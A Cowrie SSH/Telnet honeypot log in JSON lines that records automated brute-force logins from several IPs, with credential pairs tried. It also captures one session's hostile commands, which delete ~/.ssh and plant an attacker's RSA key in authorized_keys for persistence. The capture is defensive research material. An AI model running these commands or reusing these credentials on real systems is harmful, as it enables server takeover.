{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:32:50.567170Z","src_ip":"212.227.235.229","session":"7d5630adb6f7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:32:51.655708Z","src_ip":"212.227.235.229","session":"7d5630adb6f7"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:32:52.921350Z","src_ip":"212.227.235.229","session":"7d5630adb6f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43740,"dst_ip":"1.2.3.4","dst_port":22,"session":"48a3a43a95b9","protocol":"ssh","message":"New connection: 212.227.235.229:43740 (1.2.3.4:22) [session: 48a3a43a95b9]","sensor":"my-vps","timestamp":"2025-09-09T02:32:53.276064Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:32:53.277527Z","src_ip":"212.227.235.229","session":"48a3a43a95b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:32:53.586150Z","src_ip":"212.227.235.229","session":"48a3a43a95b9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:32:54.855439Z","src_ip":"212.227.235.229","session":"48a3a43a95b9"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:32:55.165659Z","src_ip":"212.227.235.229","session":"875ee7022abd"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:32:55.166792Z","src_ip":"212.227.235.229","session":"48a3a43a95b9"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54728,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a04bd28fa27","protocol":"ssh","message":"New connection: 217.72.205.35:54728 (1.2.3.4:22) [session: 4a04bd28fa27]","sensor":"my-vps","timestamp":"2025-09-09T02:33:02.632923Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:33:02.633919Z","src_ip":"217.72.205.35","session":"4a04bd28fa27"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11774,"dst_ip":"1.2.3.4","dst_port":22,"session":"082be14353b7","protocol":"ssh","message":"New connection: 185.152.45.241:11774 (1.2.3.4:22) [session: 082be14353b7]","sensor":"my-vps","timestamp":"2025-09-09T02:33:14.640298Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:33:14.641277Z","src_ip":"185.152.45.241","session":"082be14353b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:33:14.719082Z","src_ip":"185.152.45.241","session":"082be14353b7"}
{"eventid":"cowrie.login.success","username":"root","password":"ab1234","message":"login attempt [root/ab1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:33:14.969140Z","src_ip":"185.152.45.241","session":"082be14353b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:33:15.137706Z","src_ip":"185.152.45.241","session":"082be14353b7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:33:15.138472Z","src_ip":"185.152.45.241","session":"082be14353b7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:33:15.139637Z","src_ip":"185.152.45.241","session":"082be14353b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:33:15.191189Z","src_ip":"185.152.45.241","session":"082be14353b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:33:15.306578Z","src_ip":"185.152.45.241","session":"082be14353b7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:33:15.307388Z","src_ip":"185.152.45.241","session":"082be14353b7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:33:15.354012Z","src_ip":"185.152.45.241","session":"082be14353b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:33:15.355000Z","src_ip":"185.152.45.241","session":"082be14353b7"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11775,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b0dfaa9921b","protocol":"ssh","message":"New connection: 185.152.45.241:11775 (1.2.3.4:22) [session: 9b0dfaa9921b]","sensor":"my-vps","timestamp":"2025-09-09T02:33:15.430047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:33:15.430710Z","src_ip":"185.152.45.241","session":"9b0dfaa9921b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:33:15.478838Z","src_ip":"185.152.45.241","session":"9b0dfaa9921b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:33:15.710335Z","src_ip":"185.152.45.241","session":"9b0dfaa9921b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:33:16.759670Z","src_ip":"185.152.45.241","session":"9b0dfaa9921b"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11776,"dst_ip":"1.2.3.4","dst_port":22,"session":"85e2d43d91ee","protocol":"ssh","message":"New connection: 185.152.45.241:11776 (1.2.3.4:22) [session: 85e2d43d91ee]","sensor":"my-vps","timestamp":"2025-09-09T02:33:16.803721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:33:16.804574Z","src_ip":"185.152.45.241","session":"85e2d43d91ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:33:16.848935Z","src_ip":"185.152.45.241","session":"85e2d43d91ee"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:33:17.069379Z","src_ip":"185.152.45.241","session":"85e2d43d91ee"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:33:17.140351Z","src_ip":"185.152.45.241","session":"082be14353b7"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:33:17.141643Z","src_ip":"185.152.45.241","session":"85e2d43d91ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58858,"dst_ip":"1.2.3.4","dst_port":22,"session":"c374915f9381","protocol":"ssh","message":"New connection: 212.227.235.229:58858 (1.2.3.4:22) [session: c374915f9381]","sensor":"my-vps","timestamp":"2025-09-09T02:33:28.674051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:33:28.683498Z","src_ip":"212.227.235.229","session":"c374915f9381"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:33:28.931298Z","src_ip":"212.227.235.229","session":"c374915f9381"}
{"eventid":"cowrie.login.failed","username":"jira","password":"1234567","message":"login attempt [jira/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T02:33:29.932918Z","src_ip":"212.227.235.229","session":"c374915f9381"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:33:31.185917Z","src_ip":"212.227.235.229","session":"c374915f9381"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38278,"dst_ip":"1.2.3.4","dst_port":22,"session":"733e395cf4df","protocol":"ssh","message":"New connection: 212.227.235.229:38278 (1.2.3.4:22) [session: 733e395cf4df]","sensor":"my-vps","timestamp":"2025-09-09T02:33:52.905415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:33:52.907332Z","src_ip":"212.227.235.229","session":"733e395cf4df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54878,"dst_ip":"1.2.3.4","dst_port":22,"session":"0978b050e726","protocol":"ssh","message":"New connection: 212.227.235.229:54878 (1.2.3.4:22) [session: 0978b050e726]","sensor":"my-vps","timestamp":"2025-09-09T02:33:53.089134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:33:53.096513Z","src_ip":"212.227.235.229","session":"0978b050e726"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:33:53.205799Z","src_ip":"212.227.235.229","session":"733e395cf4df"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:33:53.477245Z","src_ip":"212.227.235.229","session":"0978b050e726"}
{"eventid":"cowrie.login.failed","username":"doris","password":"doris","message":"login attempt [doris/doris] failed","sensor":"my-vps","timestamp":"2025-09-09T02:33:54.403879Z","src_ip":"212.227.235.229","session":"733e395cf4df"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T02:33:54.995092Z","src_ip":"212.227.235.229","session":"0978b050e726"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:33:55.708226Z","src_ip":"212.227.235.229","session":"733e395cf4df"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:33:56.386541Z","src_ip":"212.227.235.229","session":"0978b050e726"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59821,"dst_ip":"1.2.3.4","dst_port":23,"session":"f11adfa5ecc3","protocol":"telnet","message":"New connection: 212.227.235.229:59821 (1.2.3.4:23) [session: f11adfa5ecc3]","sensor":"my-vps","timestamp":"2025-09-09T02:34:14.963178Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59836,"dst_ip":"1.2.3.4","dst_port":23,"session":"530483ba080f","protocol":"telnet","message":"New connection: 212.227.235.229:59836 (1.2.3.4:23) [session: 530483ba080f]","sensor":"my-vps","timestamp":"2025-09-09T02:34:15.996971Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59848,"dst_ip":"1.2.3.4","dst_port":23,"session":"d12f5d0f1728","protocol":"telnet","message":"New connection: 212.227.235.229:59848 (1.2.3.4:23) [session: d12f5d0f1728]","sensor":"my-vps","timestamp":"2025-09-09T02:34:18.019753Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59991,"dst_ip":"1.2.3.4","dst_port":23,"session":"d435bb8e0734","protocol":"telnet","message":"New connection: 212.227.235.229:59991 (1.2.3.4:23) [session: d435bb8e0734]","sensor":"my-vps","timestamp":"2025-09-09T02:34:22.365817Z"}
{"eventid":"cowrie.session.closed","duration":12.681581974029541,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:27.644661Z","src_ip":"212.227.235.229","session":"f11adfa5ecc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60027,"dst_ip":"1.2.3.4","dst_port":23,"session":"fd978467421f","protocol":"telnet","message":"New connection: 212.227.235.229:60027 (1.2.3.4:23) [session: fd978467421f]","sensor":"my-vps","timestamp":"2025-09-09T02:34:27.921324Z"}
{"eventid":"cowrie.session.closed","duration":13.902132034301758,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:29.899006Z","src_ip":"212.227.235.229","session":"530483ba080f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60083,"dst_ip":"1.2.3.4","dst_port":23,"session":"c1bc79f9ae3e","protocol":"telnet","message":"New connection: 212.227.235.229:60083 (1.2.3.4:23) [session: c1bc79f9ae3e]","sensor":"my-vps","timestamp":"2025-09-09T02:34:30.178863Z"}
